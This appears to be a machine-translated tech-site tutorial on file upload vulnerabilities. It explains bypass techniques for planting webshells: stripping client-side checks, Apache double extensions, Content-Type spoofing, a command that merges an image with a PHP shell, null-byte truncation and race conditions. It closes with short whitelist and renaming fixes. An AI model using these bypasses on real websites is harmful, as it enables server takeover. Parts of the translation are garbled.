Shulou(Shulou.com)06/01 Report--

Introduction

In modern Internet sites, uploading files is basically a common function that allows users to upload pictures, videos and other types of files. If there is a file upload vulnerability on the website, then a malicious user can upload the executable script to the web server, gain website privileges, and further gongji web the server.

When uploading files, if the server does not strictly verify and filter the files uploaded by the client, it is easy to create file upload vulnerabilities, that is, uploading arbitrary files (including script files, php,jsp,asp,aspx, etc.)

Malicious users can use the uploaded webshell to control the entire website or even the server.

Bypass

Js detection bypass

Js detection bypass vulnerabilities are common when users upload files. If the suffix is not allowed, the pop-up window tells you that the data packets uploaded to the file are not uploaded to the server at this time, but only detected by JavaScript in the client browser.

There are two ways to bypass at this point

1. Use the browser plug-in to delete the JavaScript code that detects the file suffix, and then upload the file

two。 First, change the suffix of the file to be uploaded to allow the suffix to bypass the detection of the JavaScript code, and then grab the package and modify it to the original suffix.

You can see that the file was successfully uploaded by bypassing js detection.

File suffix bypass

File suffix bypass is that files with certain suffixes restricted by the server are not allowed to be uploaded. Some Apache in but allows you to parse other file suffixes. For example, the following code in the Apache configuration file httpd.conf can parse php and phtml files.

AddType application/x-httpd-php .php .phtml

In the Apache parsing order, the file suffix is parsed from right to left. If the rightmost extension is not recognized, continue to judge to the left until it encounters a file suffix that can be parsed, so if the uploaded file name is similar to luguo.php.xxx, because the suffix xxx cannot be parsed, it parses to luguo.php to the left.

File type bypass

This kind of bypass requires two simple judgments.

Grab the bag with burp suite

When uploading a php file

You can see that the value of Conetent-Type in the packet is application/x-php

When uploading jpg files

You can see that the value of Content-Type in the packet is image/jpeg

It can be inferred that the server determines the type of file by the value of Content-Type, so it can be bypassed, because the value of Content-Type is passed through the client and can be modified. When uploading php files, we only need to change Content-Type to image/jpeg in Burp suite to bypass detection.

There is also a file upload loophole in php. Php calls the function getimagesize () to get the information about the length and width of the picture. If the upload is not a picture, then getimagesize () cannot get the information and is not allowed to upload. But, we can merge the picture and webshell into a file. Click the command below.

Cat index.png luguo.php > snowwolf.php

Access the uploaded address and upload successfully

File truncation bypass

In php, 00 represents the Terminator, so all characters after 00 are deleted

Truncation condition magic_quotes_gpc of php version less than 5.3.4 Magneto php is off

When uploading a file, the server takes the content of the Get parameter name as the first part of the file name, and then the image generated by time is the second part.

The modified parameter is truncated to luguo.php.ipg, and when the file is saved to the server, the .jpg and the image name generated by time will be truncated, leaving only luguo.php, so the webshell is uploaded successfully.

Competitive conditions bypass

The logic of some sites is to allow arbitrary files to be uploaded first, then check to see if they contain webshell scripts, and delete them if they do. The vulnerability here is that there is a time difference between the successful upload of the file and the deletion operation. Malicious users can take advantage of the time difference to complete the gongji of the competition condition.

Gongji first uploads a webshell script snowwolf.php,snowwolf.php generates a new webshell script, which is as follows

When the snowwolf.php is uploaded successfully, the gongji immediately accesses the snowwolf.php, and the shell.php file is immediately generated on the server side, and the gongji is completed.

You can see that the shell.php file has been generated

Ps: hand speed after being single for many years can come in handy.

Repair suggestion

Judge the legality of file suffixes by whitelist

Rename the file uploaded by the user

File upload vulnerability web page demo source link: https://pan.baidu.com/s/1V5b7_FvQjd4yKdaoDbBXCw

Extraction code: 5i89

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.